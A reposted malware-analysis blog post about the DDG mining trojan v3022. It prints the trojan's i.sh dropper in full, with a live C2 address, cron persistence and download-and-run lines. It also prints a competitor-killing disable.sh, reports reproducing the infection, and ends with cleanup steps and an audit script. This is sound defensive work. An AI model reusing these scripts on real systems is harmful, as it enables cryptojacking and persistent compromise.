DDG Full Suite: v3022

Published: 2023/12/13

This post reproduces the new DDG variant 3022 based on the analysis 360Netlab recently published, and covers part of the analysis and the cleanup method.
This post is for learning and exchange only, to give the many victims some ideas for cleanup. Do not use it for illegal purposes; the author bears no responsibility for any consequences.
For details see: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

1. Download

Download script: http://119.9.106.27:8000/i.sh (the name i.sh is DDG's usual style)

Sample location: 119.9.106.27:8000/static/3022/



First, download the i.sh script and look at what it contains:

```sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

# Persistence: re-fetch and run i.sh every 15 minutes, via root's crontab and
# the raw spool file of both common cron layouts
echo "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -
echo "" > /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

# Probe for a writable install directory: each successful touch moves the
# working directory there, so the last writable one wins, /tmp is the fallback
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)

# If the miner (lrnbbce) is not running, drop any stale copy and download the
# build matching the CPU architecture, then start it trying every location
ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce
if [ ! -f "lrnbbce" ]; then
    wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce
fi
chmod +x lrnbbce
$(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbce

# Kill the previous DDG builds (lrnbbcb, lrnbbcc, lrnbbcd)
ps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9
```

This is the DDG trojan's usual routine: set the PATH, add a cron job, download and run the miner, and delete or disable other mining trojans (competition in the mining business is fierce).
Starting with version 3014 it added a cloud-delivered configuration, disable.sh, to knock out competitors centrally.
Script location: http://119.9.106.27:8000/static/disable.sh; its contents are as follows:

```sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

# Block the yilu and BillGates miners from installing: create their paths as
# empty, non-writable, non-executable, immutable files
mkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64

# Same treatment for their init scripts and rc links
rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux

# BillGates keeps its PIDs in /tmp/gates.lod and /tmp/moni.lod: delete the
# binaries behind those PIDs, kill them, and remove the PID files
if [ -e "/tmp/gates.lod" ]; then
    rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
    kill -9 $(cat /tmp/gates.lod)
    rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
    kill -9 $(cat /tmp/moni.lod)
    rm -rf /tmp/{gates,moni}.lod
fi

# Kill any competitor processes that are already running
ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9
```

The competing mining processes are collected in this script, which kills the yilu miner, the BillGates family's gates process, and so on.
That was the earlier version, though; the current one is more advanced and delivers a binary called disable directly.

For what this disable binary does, see the 360 article referenced above (the image in the original is from the 360netlab blog).




To keep other mining programs out, DDG 3022 currently takes the following measures:
1. Modify the hosts file to block other miners from being delivered
2. Kill other mining programs
3. Use the disable binary

2. Reproduction

Next, run the script to start the reproduction. The crontab entry has been written (screenshot in the original).

The CPU is at full load and the mining program is running.

Look at the sample files under /tmp (screenshot in the original).

3. Cleanup

Old routine: whatever the mining trojan does, we just do the reverse.

Remove the `*/15 * * * * curl -fsSL http://119.9.106.27:8000/i.sh | sh` entry (the line i.sh appended with `echo "..." >> /var/spool/cron/root`) from /var/spool/cron/crontab/root and /var/spool/cron/root. Since i.sh also installs it through `crontab -`, check root's crontab with `crontab -l` as well.

Delete /tmp/6Tx3Wq, /tmp/disable and /usr/bin/lrnbbce

Kill the processes 6Tx3Wq and lrnbbce

At this point the mining program is cleaned up; afterwards the added hosts entries and other files can be removed.
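A read-only audit of the indicators the i.sh analysis and the cleanup steps above describe (the 15-minute i.sh cron line, the dropped lrnbbce / 6Tx3Wq / disable binaries in the directories i.sh probes, and their processes), added here as an example and not part of the original post. The function names are this example's own, and the process check assumes a Linux /proc.

```sh
#!/bin/sh
# Added example (not from the original post): read-only audit for the DDG 3022
# indicators listed above. Function names are this example's own assumptions.

DDG_CRON_MARK='119.9.106.27:8000/i.sh'   # URL fragment of the 15-minute cron line
DDG_NAMES='lrnbbce 6Tx3Wq disable'       # dropped binaries / process names
DDG_DIRS='/tmp /usr/bin /usr/libexec /usr/local/bin'   # directories i.sh probes

# ddg_cron_hit FILE: succeed if FILE is a crontab that re-fetches i.sh.
ddg_cron_hit() {
    [ -f "$1" ] && grep -qF "$DDG_CRON_MARK" "$1"
}

# ddg_files [ROOT]: print each dropped binary found under ROOT (default /).
ddg_files() {
    root=${1:-}
    for d in $DDG_DIRS; do
        for n in $DDG_NAMES; do
            [ -f "$root$d/$n" ] && echo "$root$d/$n"
        done
    done
    return 0
}

# ddg_procs: print PIDs whose command name is a DDG binary (Linux /proc only).
ddg_procs() {
    for p in /proc/[0-9]*; do
        [ -r "$p/comm" ] || continue
        read -r comm < "$p/comm" 2>/dev/null || continue
        for n in $DDG_NAMES; do
            [ "$comm" = "$n" ] && echo "${p#/proc/}"
        done
    done
    return 0
}

# ddg_audit: print findings; returns the number of indicator classes that hit.
ddg_audit() {
    hits=0
    for c in /var/spool/cron/root /var/spool/cron/crontabs/root; do
        ddg_cron_hit "$c" && { echo "cron: $c"; hits=$((hits + 1)); }
    done
    f=$(ddg_files) && [ -n "$f" ] && { echo "files: $f"; hits=$((hits + 1)); }
    p=$(ddg_procs) && [ -n "$p" ] && { echo "procs: $p"; hits=$((hits + 1)); }
    return "$hits"
}

ddg_audit || echo "DDG indicators found in $? classes; clean up as described above"
```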


References:

https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/


Reposted from: https://www.cnblogs.com/Id3al/p/10706324.html
